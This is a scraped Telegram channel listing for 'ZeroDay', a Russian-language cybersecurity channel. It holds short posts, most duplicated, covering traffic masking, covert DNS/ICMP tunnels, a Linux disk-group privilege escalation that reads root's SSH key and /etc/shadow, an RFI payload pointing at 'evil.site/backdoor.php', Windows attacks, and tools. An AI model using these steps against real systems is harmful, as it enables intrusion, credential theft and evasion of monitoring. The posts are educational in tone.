
Україна Online: Новини | Політика

Телеграмна служба новин - Україна

Резидент

Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

Николаевский Ванёк

Лачен пише

Реальний Київ | Украина

Реальна Війна

Україна Online: Новини | Політика

Телеграмна служба новин - Україна

Резидент

Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

Николаевский Ванёк

Лачен пише

Реальний Київ | Украина

Реальна Війна

Україна Online: Новини | Політика

Телеграмна служба новин - Україна

Резидент

ZeroDay | Кибербезопасность
Ваш учебник по кибербезопасности
Реклама - @bashmak_media
https://telega.in/c/cybersec_academy
РКН: https://vk.cc/cHYqeq
Реклама - @bashmak_media
https://telega.in/c/cybersec_academy
РКН: https://vk.cc/cHYqeq
TGlist rating
0
0
TypePublic
Verification
Not verifiedTrust
Not trustedLocationРосія
LanguageOther
Channel creation dateJul 16, 2023
Added to TGlist
Oct 31, 2024Linked chat
ZК
CyberSec chat
103
Records
21.04.202523:59
36.1KSubscribers19.02.202503:07
300Citation index21.03.202504:23
2.9KAverage views per post26.03.202513:30
2.5KAverage views per ad post29.03.202523:59
7.29%ER20.03.202523:59
8.38%ERRGrowth
Subscribers
Citation index
Avg views per post
Avg views per ad post
ER
ERR
28.03.202514:00
Маскирование трафика с Cloudflare, DNS over HTTPS (DoH) и Shadowsocks
👋
⏺Зачем это нужно: Если ваш трафик мониторится Deep Packet Inspection (DPI) или ограничивается провайдерами, то стандартные VPN и прокси могут не сработать. DoH + Shadowsocks помогают скрывать трафик, обходить блокировки и не палиться.
⏺Включаем DoH (DNS over HTTPS): Чтобы скрыть DNS-запросы от провайдера и DPI, включаем DoH с серверами Cloudflare (
Настраиваем Cloudflare DoH в systemd-resolved:
Добавляем:
Применяем настройки:
⏺Поднимаем Shadowsocks и тем самым скрываем реальный трафик. Shadowsocks не просто шифрует трафик — он делает его похожим на обычный HTTPS, обходя DPI. Устанавливаем сервер Shadowsocks:
Открываем конфиг
Запускаем сервер:
⏺Скрываем IP за Cloudflare: Теперь трафик зашифрован, но IP-сервер все еще виден. Тут нужен cloudflare. Сначала добавляем домен в Cloudflare и включаем Proxy Mode. И далее активируем Argo Tunnel, чтобы трафик шел через Cloudflare без прямого IP-соединения:
ZeroDay | #redteam #маскировкатрафика
👋
Приветствую в мире цифровой безопасности!
Сегодня разберем, как можно замаскировать трафик при Red Team-операциях и не только.
⏺Зачем это нужно: Если ваш трафик мониторится Deep Packet Inspection (DPI) или ограничивается провайдерами, то стандартные VPN и прокси могут не сработать. DoH + Shadowsocks помогают скрывать трафик, обходить блокировки и не палиться.
⏺Включаем DoH (DNS over HTTPS): Чтобы скрыть DNS-запросы от провайдера и DPI, включаем DoH с серверами Cloudflare (
1.1.1.1
). Проверяем, поддерживает ли система DoH:resolvectl status
Настраиваем Cloudflare DoH в systemd-resolved:
sudo nano /etc/systemd/resolved.conf
Добавляем:
[Resolve]
DNS=1.1.1.1#cloudflare-dns.com
FallbackDNS=1.0.0.1#cloudflare-dns.com
DNSOverTLS=yes
Применяем настройки:
sudo systemctl restart systemd-resolved
⏺Поднимаем Shadowsocks и тем самым скрываем реальный трафик. Shadowsocks не просто шифрует трафик — он делает его похожим на обычный HTTPS, обходя DPI. Устанавливаем сервер Shadowsocks:
sudo apt install shadowsocks-libev
Открываем конфиг
/etc/shadowsocks-libev/config.json
:{
Запускаем сервер:
sudo systemctl start shadowsocks-libev
⏺Скрываем IP за Cloudflare: Теперь трафик зашифрован, но IP-сервер все еще виден. Тут нужен cloudflare. Сначала добавляем домен в Cloudflare и включаем Proxy Mode. И далее активируем Argo Tunnel, чтобы трафик шел через Cloudflare без прямого IP-соединения:
cloudflared tunnel create my-tunnel
cloudflared tunnel route dns my-tunnel mydomain.com
cloudflared tunnel run my-tunnel
ZeroDay | #redteam #маскировкатрафика
01.04.202515:40
Расширенная маскировка трафика: ESNI, V2Ray и Covert Channels
Часть 2
👋
⏺ESNI против SNI-фильтрации: Когда подключаетесь к сайту по HTTPS, провайдер все равно видит домен через SNI (Server Name Indication). Так можно легко заблокировать целые сайты, даже если у вас VPN или прокси.
⏺И тут Encrypted SNI (ESNI) решает проблему, зашифровывая эту информацию. На Cloudflare ESNI включается прямо в браузере:
• Открываем about:config в Firefox
• Ищем network.security.esni.enabled
• Ставим true
⏺V2Ray: превращаем трафик в обычный веб: Shadowsocks хорош, но его можно обнаружить. V2Ray позволяет маскировать соединения, превращая их в обычные HTTP-запросы.
Устанавливаем V2Ray на сервер:
Настраиваем config.json:
⏺Covert Channels: передача данных в неожиданных местах: Что если DPI фильтрует вообще все, кроме разрешенного трафика? Можно передавать данные там, где их ну точно не ждут:
1️⃣ICMP туннелинг (DNSCat2) — прячем трафик в пингах
2️⃣DNS туннелинг (iodine) — передаем данные через DNS-запросы
3️⃣HTTP(S) covert channel — запаковываем полезную нагрузку в GET/POST-запросы
Пример ICMP-туннеля:
На клиенте:
ZeroDay | #маскировкатрафика
Часть 2
👋
Приветствую в мире цифровой безопасности!
Сегодня разберем, как усилить маскировку с помощью ESNI, V2Ray и скрытых каналов передачи данных.
⏺ESNI против SNI-фильтрации: Когда подключаетесь к сайту по HTTPS, провайдер все равно видит домен через SNI (Server Name Indication). Так можно легко заблокировать целые сайты, даже если у вас VPN или прокси.
⏺И тут Encrypted SNI (ESNI) решает проблему, зашифровывая эту информацию. На Cloudflare ESNI включается прямо в браузере:
• Открываем about:config в Firefox
• Ищем network.security.esni.enabled
• Ставим true
⏺V2Ray: превращаем трафик в обычный веб: Shadowsocks хорош, но его можно обнаружить. V2Ray позволяет маскировать соединения, превращая их в обычные HTTP-запросы.
Устанавливаем V2Ray на сервер:
bash <(curl -L https://install.direct/go.sh)
Настраиваем config.json:
{
⏺Covert Channels: передача данных в неожиданных местах: Что если DPI фильтрует вообще все, кроме разрешенного трафика? Можно передавать данные там, где их ну точно не ждут:
1️⃣ICMP туннелинг (DNSCat2) — прячем трафик в пингах
2️⃣DNS туннелинг (iodine) — передаем данные через DNS-запросы
3️⃣HTTP(S) covert channel — запаковываем полезную нагрузку в GET/POST-запросы
Пример ICMP-туннеля:
sudo apt install iodine
На клиенте:
iodine -f 10.0.0.1 mydomain.com
ZeroDay | #маскировкатрафика
16.04.202516:39
Повышение привилегий через группу disk в Linux
👋
⏺В чем суть: Если юзер состоит в группе disk, он может взаимодействовать с устройствами хранения — в частности, с основным диском
⏺Сценарий атаки на пальцах:
1️⃣Создаем пользователя raj и добавляем его в элитную группу disk:
2️⃣Включаем SSH-доступ для root (не забудьте про PermitRootLogin yes и PubkeyAuthentication yes).
3️⃣Подключаемся как raj, проверяем диск и открываем debugfs:
4️⃣Копируем приватный ключ, даем ему нужные права и входим в систему уже как root:
5️⃣Дальше по вкусу: читаем /etc/shadow, выкачиваем хэши, устраиваем барбекю.
⏺Почему это реально опасно: Это не баг, это фича, которой можно злоупотребить. Особенно если кто-то случайно или по глупости добавил пользователя в disk. А на обычных десктопах или в dev-средах это бывает вполне себе часто.
ZeroDay | #атака
👋
Приветствую в мире цифровой безопасности!
Сегодня разберем довольно недооцененную технику эскалации прав в Linux — через группу disk.
⏺В чем суть: Если юзер состоит в группе disk, он может взаимодействовать с устройствами хранения — в частности, с основным диском
/dev/sda
. Это значит, что он может читать (а иногда и писать!) в файловую систему напрямую — например, достать id_rsa root-пользователя.⏺Сценарий атаки на пальцах:
1️⃣Создаем пользователя raj и добавляем его в элитную группу disk:
adduser raj
2️⃣Включаем SSH-доступ для root (не забудьте про PermitRootLogin yes и PubkeyAuthentication yes).
3️⃣Подключаемся как raj, проверяем диск и открываем debugfs:
debugfs /dev/sda3
4️⃣Копируем приватный ключ, даем ему нужные права и входим в систему уже как root:
chmod 600 id_rsa
5️⃣Дальше по вкусу: читаем /etc/shadow, выкачиваем хэши, устраиваем барбекю.
⏺Почему это реально опасно: Это не баг, это фича, которой можно злоупотребить. Особенно если кто-то случайно или по глупости добавил пользователя в disk. А на обычных десктопах или в dev-средах это бывает вполне себе часто.
ZeroDay | #атака
25.03.202515:00
Настройка фаервола в Windows через PowerShell
👋
⏺Встроенный фаервол — это удобный инструмент для блокировки нежеланных соединений. Но вдруг хотите более точной настройки, тогда и можно использовать PowerShell и его модуль NetSecurity. Он дает доступ вообще ко всем возможностям брандмауэра, от создания новых правил до их удаления.
⏺Запуск модуля NetSecurity: Чтобы приступить к настройке, нужно сначала подключить модуль NetSecurity:
⏺Смотрим текущие правила: сейчас, когда уже модуль подключен, давайте узнаем, какие правила уже стоят в системе. Для этого используем команду:
И вот вам обзор: сколько правил, какие включены, какой трафик блокируется. Если захотите подробности по каждому правилу, можно получить все параметры:
⏺Создаем новое правило: Теперь сделаем реально полезную штуку — заблокируем WINS. Для этого создаем правило, которое блокирует входящий трафик:
⏺Изменяем существующее правило: Если захотите поменять действие у уже настроенного правила, например, разрешить WINS, используем команду:
Вот теперь WINS снова работает.
⏺Удаляем ненужные правила: Если старое правило вам больше не нужно, удаляем его:
⏺Удаление сразу нескольких правил: Еще один лайфхак — удалить несколько правил сразу. Например, все отключенные правила:
ZeroDay | #firewall #powershell
👋
Приветствую в мире цифровой безопасности!
Сегодня поговорим о том, как можно настроить фаервол в Windows через PowerShell
⏺Встроенный фаервол — это удобный инструмент для блокировки нежеланных соединений. Но вдруг хотите более точной настройки, тогда и можно использовать PowerShell и его модуль NetSecurity. Он дает доступ вообще ко всем возможностям брандмауэра, от создания новых правил до их удаления.
⏺Запуск модуля NetSecurity: Чтобы приступить к настройке, нужно сначала подключить модуль NetSecurity:
Import-Module -Name 'NetSecurity'
⏺Смотрим текущие правила: сейчас, когда уже модуль подключен, давайте узнаем, какие правила уже стоят в системе. Для этого используем команду:
Get-NetFirewallRule | Select-Object DisplayName, Enabled, Direction, Action -First 10
И вот вам обзор: сколько правил, какие включены, какой трафик блокируется. Если захотите подробности по каждому правилу, можно получить все параметры:
Get-NetFirewallRule | Select-Object * -First 1
⏺Создаем новое правило: Теперь сделаем реально полезную штуку — заблокируем WINS. Для этого создаем правило, которое блокирует входящий трафик:
$Params = @{
⏺Изменяем существующее правило: Если захотите поменять действие у уже настроенного правила, например, разрешить WINS, используем команду:
$Params = @{
Вот теперь WINS снова работает.
⏺Удаляем ненужные правила: Если старое правило вам больше не нужно, удаляем его:
Remove-NetFirewallRule -DisplayName "Block WINS"
⏺Удаление сразу нескольких правил: Еще один лайфхак — удалить несколько правил сразу. Например, все отключенные правила:
Remove-NetFirewallRule -Enabled 'False'
ZeroDay | #firewall #powershell


24.03.202512:00
CORS, CORP, COEP, COOP. Разбираемся со всеми CO* и смотрим на нюансы
CORS, CORP, COEP, COOP — что вообще объединят все эти аббревиатуры, кроме того, что они начинаются на “CO”? Эти политики играют мега важную роль в безопасности веб-приложений, ограничивая доступ к ресурсам с других доменов и предотвращая утечки данных.
⏺В статье будет разбор того, как конкретно работают эти механизмы, чем они отличаются друг от друга и почему правильная настройка очень критична для защиты ваших веб-приложений от возможных угроз.
ZeroDay | #Статья
CORS, CORP, COEP, COOP — что вообще объединят все эти аббревиатуры, кроме того, что они начинаются на “CO”? Эти политики играют мега важную роль в безопасности веб-приложений, ограничивая доступ к ресурсам с других доменов и предотвращая утечки данных.
⏺В статье будет разбор того, как конкретно работают эти механизмы, чем они отличаются друг от друга и почему правильная настройка очень критична для защиты ваших веб-приложений от возможных угроз.
ZeroDay | #Статья
31.03.202510:00
CloudFail: как обойти защиту Cloudflare и раскрыть скрытые IP
👋
⏺CloudFail — ну это прямо подарок для пентестеров. Он использует старые БД и уязвимые DNS-записи, чтобы выявить реальные IP, скрытые за защитой Cloudflare. И да, всё это делается через Tor, так что с анонимностью все ок 🤫
⏺Как работает:
1️⃣Ищет уязвимости в DNS-записях через DNSDumpster.
2️⃣Проверяет IP-адреса в базе Crimeflare — это утечка старых данных.
3️⃣Перебирает более 2500 субдоменов, используя метод брутфорса.
⏺Что нового: В форке исправлены старые ошибки с API, добавлена возможность генерировать отчёты и выводить IP в удобном списке.
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
⏺CloudFail — ну это прямо подарок для пентестеров. Он использует старые БД и уязвимые DNS-записи, чтобы выявить реальные IP, скрытые за защитой Cloudflare. И да, всё это делается через Tor, так что с анонимностью все ок 🤫
⏺Как работает:
1️⃣Ищет уязвимости в DNS-записях через DNSDumpster.
2️⃣Проверяет IP-адреса в базе Crimeflare — это утечка старых данных.
3️⃣Перебирает более 2500 субдоменов, используя метод брутфорса.
⏺Что нового: В форке исправлены старые ошибки с API, добавлена возможность генерировать отчёты и выводить IP в удобном списке.
ZeroDay | #Инструмент


27.03.202516:09
Fastflux: как быстро уходить от блокировок?
👋
⏺Что такое Fast Flux: это техника, которую используют хакеры, скрывая свои вредоносные серверы, постоянно меняя их IP-адреса. И да, этот способ делает их сайты и ботнеты сложными для обнаружения и блокировки.
3 столпа, на которых держится fastflux
1️⃣Частая смена IP-адресов — суть метода в том, что DNS-записи обновляются буквально каждую минуту, что делает сайт или сервер трудноуловимым.
2️⃣Сеть заражённых устройств — вместо одного сервера злоумышленники используют целую армию заражённых машин, которые перенаправляют трафик, маскируя источник атаки.
3️⃣Двухуровневый Fast Flux — это более сложная версия, в которой не только конечные серверы, но и промежуточные узлы меняют IP-адреса, создавая почти невидимую инфраструктуру.
⏺Как вы поняли, Fast Flux делает блокировку вредоносных сайтов ну сильно запарнее — как только заблокирован один IP, хакеры тут же переключают трафик на новый.
⏺Как защититься: Начнем с анализа DNS-записей и трафика на необычные изменения. Ну и не забываем подключать методы блокировки, которые учитывают поведение сети — они помогут быстрее поймать кого нужно.
ZeroDay | #fastflux
👋
Приветствую в мире цифровой безопасности!
Расскажу, как работает Fast Flux.
⏺Что такое Fast Flux: это техника, которую используют хакеры, скрывая свои вредоносные серверы, постоянно меняя их IP-адреса. И да, этот способ делает их сайты и ботнеты сложными для обнаружения и блокировки.
3 столпа, на которых держится fastflux
1️⃣Частая смена IP-адресов — суть метода в том, что DNS-записи обновляются буквально каждую минуту, что делает сайт или сервер трудноуловимым.
2️⃣Сеть заражённых устройств — вместо одного сервера злоумышленники используют целую армию заражённых машин, которые перенаправляют трафик, маскируя источник атаки.
3️⃣Двухуровневый Fast Flux — это более сложная версия, в которой не только конечные серверы, но и промежуточные узлы меняют IP-адреса, создавая почти невидимую инфраструктуру.
⏺Как вы поняли, Fast Flux делает блокировку вредоносных сайтов ну сильно запарнее — как только заблокирован один IP, хакеры тут же переключают трафик на новый.
⏺Как защититься: Начнем с анализа DNS-записей и трафика на необычные изменения. Ну и не забываем подключать методы блокировки, которые учитывают поведение сети — они помогут быстрее поймать кого нужно.
ZeroDay | #fastflux
21.03.202514:00
Rotten Potato: получаем права SYSTEM через RPC
👋
⏺Что это за атака: вся суть тут в использовании слабостей в RPC и NTLM-аутентификации. Хакер манипулирует процессом аутентификации на подставном прокси и вуаля — получает доступ с правами SYSTEM, не трогая ни одного бинарного файла.
⏺Почему это круто (для хакера, конечно): вот задумайтесь, вся атака основана на обычных службах Windows, и даже не требуется передавать вредоносные файлы. Это значит, что обычные методы защиты могут вообще не заметить проблему.
⏺Как найти следы атаки:
1️⃣Подозрительные каналы в Sysmon (EventID 17, 18) — и сразу видно, что что-то не так.
2️⃣Журнал Windows (EventID 5712 и 5154) покажет запросы на порт 6666, когда хакер пытается обойти защиту.
3️⃣Если в логах встречаем RottenPotato.exe — это уж точно сигнал тревоги.
ZeroDay | #атака
👋
Приветствую в мире цифровой безопасности!
Расскажу о еще одной уязвимости Rotten Potato.
⏺Что это за атака: вся суть тут в использовании слабостей в RPC и NTLM-аутентификации. Хакер манипулирует процессом аутентификации на подставном прокси и вуаля — получает доступ с правами SYSTEM, не трогая ни одного бинарного файла.
⏺Почему это круто (для хакера, конечно): вот задумайтесь, вся атака основана на обычных службах Windows, и даже не требуется передавать вредоносные файлы. Это значит, что обычные методы защиты могут вообще не заметить проблему.
⏺Как найти следы атаки:
1️⃣Подозрительные каналы в Sysmon (EventID 17, 18) — и сразу видно, что что-то не так.
2️⃣Журнал Windows (EventID 5712 и 5154) покажет запросы на порт 6666, когда хакер пытается обойти защиту.
3️⃣Если в логах встречаем RottenPotato.exe — это уж точно сигнал тревоги.
ZeroDay | #атака


30.03.202514:42
Редтимим мониторинг: рекон Grafana
Grafana — это не простой инструмент для анализа данных, а порой и уязвимая точка входа в корпоративную сеть. Получив доступ, хакеры могут обойти защиту и расширить атаку в сети. А это уже неприятно, да? 🙄
⏺В статье рассказано, как использовали Grafana для сканирования портов, SSRF-атак и обхода авторизации с помощью брутфорса.
ZeroDay | #Статья
Grafana — это не простой инструмент для анализа данных, а порой и уязвимая точка входа в корпоративную сеть. Получив доступ, хакеры могут обойти защиту и расширить атаку в сети. А это уже неприятно, да? 🙄
⏺В статье рассказано, как использовали Grafana для сканирования портов, SSRF-атак и обхода авторизации с помощью брутфорса.
ZeroDay | #Статья


17.04.202512:00
📝 Как работает Remote File Inclusion (RFI)
Всё начинается с безобидного параметра в URL — сайт хочет подключить нужную страницу. Но он же может подключить чужую, вместо своей 🧐
⏺Веб-приложение получает запрос вроде:
⏺Но фильтрации нет. И теперь можно подставить ссылку на внешний файл:
⏺Сервер, ничего не подозревая, скачивает внешний PHP-файл и исполняет его как часть своего кода.
⏺Этот код может делать всё: красть данные, открывать удалённый доступ, ставить бекдоры — потому что он запускается от имени сервера.
⏺Пока юзер думает, что пользуется сайтом — на сервере уже работает чужой сценарий.
ZeroDay | #атака
Всё начинается с безобидного параметра в URL — сайт хочет подключить нужную страницу. Но он же может подключить чужую, вместо своей 🧐
⏺Веб-приложение получает запрос вроде:
?page=about.php
— и просто включает указанный файл.⏺Но фильтрации нет. И теперь можно подставить ссылку на внешний файл:
?page=https://evil.site/backdoor.php
⏺Сервер, ничего не подозревая, скачивает внешний PHP-файл и исполняет его как часть своего кода.
⏺Этот код может делать всё: красть данные, открывать удалённый доступ, ставить бекдоры — потому что он запускается от имени сервера.
⏺Пока юзер думает, что пользуется сайтом — на сервере уже работает чужой сценарий.
ZeroDay | #атака


21.04.202514:17
Расследование: как фальшивые DNS-записи крадут ваши данные, а вы и не замечаете
Вы вводите URL любимого сайта, но попадаете на его идеальную копию, созданную мошенниками. Что, если DNS-система работает против вас? Подмены записей, отравление кэша и атаки через MITM — все это может привести к краже ваших данных: от паролей до криптокошельков.
⏺В статье — детальное разъяснение того, как хакеры юзают уязвимости в DNS для кражи данных, а также как можно защититься от подобных атак и избежать фишинга.
ZeroDay | #Статья
Вы вводите URL любимого сайта, но попадаете на его идеальную копию, созданную мошенниками. Что, если DNS-система работает против вас? Подмены записей, отравление кэша и атаки через MITM — все это может привести к краже ваших данных: от паролей до криптокошельков.
⏺В статье — детальное разъяснение того, как хакеры юзают уязвимости в DNS для кражи данных, а также как можно защититься от подобных атак и избежать фишинга.
ZeroDay | #Статья


04.04.202509:00
PrintNightmare: неприятная уязвимость в Windows
👋
⏺PrintNightmare — уязвимость в службе Print Spooler в Windows, которая может привести к удалённому выполнению кода на вашем устройстве. Да, это именно та служба, что управляет задачами на печать, и её уязвимость открывает доступ по сути ко всей вашей системе. Звучит страшно, верно?😦
⏺Как это работает?
1️⃣Хакер настраивает SMB-соединение с уязвимой системой и выполняет RPC-запросы.
2️⃣После этого он добавляет вредоносный драйвер, который содержит ссылку на DLL-библиотеку.
3️⃣Windows загружает эту библиотеку, предоставляя хакеру доступ к системе.
⏺В чем опасность: Print Spooler, как мы уже обсудили, играет супер важную роль в работе системы, а её уязвимость позволяет обходить многие защиты. Патчи и обновления — это, конечно, важно, но эта опасность все же продолжает оставаться на горизонте, и новые способы атак могут быть уже на подходе.
ZeroDay | #fastflux
👋
Приветствую в мире цифровой безопасности!
Сегодня поговорим про уязвимость PrintNightmare.
⏺PrintNightmare — уязвимость в службе Print Spooler в Windows, которая может привести к удалённому выполнению кода на вашем устройстве. Да, это именно та служба, что управляет задачами на печать, и её уязвимость открывает доступ по сути ко всей вашей системе. Звучит страшно, верно?😦
⏺Как это работает?
1️⃣Хакер настраивает SMB-соединение с уязвимой системой и выполняет RPC-запросы.
2️⃣После этого он добавляет вредоносный драйвер, который содержит ссылку на DLL-библиотеку.
3️⃣Windows загружает эту библиотеку, предоставляя хакеру доступ к системе.
⏺В чем опасность: Print Spooler, как мы уже обсудили, играет супер важную роль в работе системы, а её уязвимость позволяет обходить многие защиты. Патчи и обновления — это, конечно, важно, но эта опасность все же продолжает оставаться на горизонте, и новые способы атак могут быть уже на подходе.
ZeroDay | #fastflux
25.03.202510:00
AlterX: Быстро генерируем субдомены для пентеста
👋
⏺Что это такое: AlterX — настоящий мастхэв для пентестеров и ИБшников. Он использует умные шаблоны и переменные, чтобы создавать списки субдоменов, которые реально работают. Убираем всякие неактуальные домены и увеличиваем шанс на реальный результат.
⏺Как это работает: вы задаете шаблоны с переменными типа {{sub}}, {{suffix}} и {{tld}}, а AlterX генерирует вам все возможные комбинации, которые могут быть полезны. Хотите больше точности? Просто подгоните шаблон под свой проект.
⏺Зачем вам AlterX: если вы делитесь своими шаблонами с командой или работаете на нескольких проектах, то AlterX позволит легко и быстро создавать словари для субдоменов. И, что важно, вы точно будете проверять то, что действительно существует.
⏺И 3 крутые фишки от меня:
• Мгновенные и точные пермутации с кастомными паттернами
• Использует переменные как в Nuclei, чтобы сделать словари умными
• Обогащение словарей за секунду и гибкая настройка
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
⏺Что это такое: AlterX — настоящий мастхэв для пентестеров и ИБшников. Он использует умные шаблоны и переменные, чтобы создавать списки субдоменов, которые реально работают. Убираем всякие неактуальные домены и увеличиваем шанс на реальный результат.
⏺Как это работает: вы задаете шаблоны с переменными типа {{sub}}, {{suffix}} и {{tld}}, а AlterX генерирует вам все возможные комбинации, которые могут быть полезны. Хотите больше точности? Просто подгоните шаблон под свой проект.
⏺Зачем вам AlterX: если вы делитесь своими шаблонами с командой или работаете на нескольких проектах, то AlterX позволит легко и быстро создавать словари для субдоменов. И, что важно, вы точно будете проверять то, что действительно существует.
⏺И 3 крутые фишки от меня:
• Мгновенные и точные пермутации с кастомными паттернами
• Использует переменные как в Nuclei, чтобы сделать словари умными
• Обогащение словарей за секунду и гибкая настройка
ZeroDay | #Инструмент


25.03.202512:00
🚩Ищите красные флаги — и это не про отношения
Selectel подготовил CTF-задачи для специалистов по кибербезопасности и предлагает вам решить их. Вы потренируете не только навыки криптографии и разработки, но и почувствуете себя настоящим детективом, ведь некоторые задачи закручены хитроумнее, чем преступления в книгах Агаты Кристи.
🔎 Шпионские штучки
Наконец, вам удалось перехватить трафик, в котором должен быть ключ к адресу одной секретной службы. Вы почти у цели, осталось разобрать дамп и следовать верным маршрутом.
🔎 Приглашение на ИБ-вечеринку
Специалисты по ИБ закатили праздник, но без специального ключа на него не попасть. Отыщите этот ключ, пока веселье еще в разгаре!
🔎 Тир на открытом воздухе
Звучит заманчиво, но только не в ветреную погоду. Попробуйте выстрелить точно в яблочко, чтобы получить награду.
Для каждой задачи уже готово решение, так что можно сразу проверить себя.
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2VtzqvmPPVA
Selectel подготовил CTF-задачи для специалистов по кибербезопасности и предлагает вам решить их. Вы потренируете не только навыки криптографии и разработки, но и почувствуете себя настоящим детективом, ведь некоторые задачи закручены хитроумнее, чем преступления в книгах Агаты Кристи.
🔎 Шпионские штучки
Наконец, вам удалось перехватить трафик, в котором должен быть ключ к адресу одной секретной службы. Вы почти у цели, осталось разобрать дамп и следовать верным маршрутом.
🔎 Приглашение на ИБ-вечеринку
Специалисты по ИБ закатили праздник, но без специального ключа на него не попасть. Отыщите этот ключ, пока веселье еще в разгаре!
🔎 Тир на открытом воздухе
Звучит заманчиво, но только не в ветреную погоду. Попробуйте выстрелить точно в яблочко, чтобы получить награду.
Для каждой задачи уже готово решение, так что можно сразу проверить себя.
Реклама. АО “Селектел”, ИНН: 7810962785. ERID: 2VtzqvmPPVA
Log in to unlock more functionality.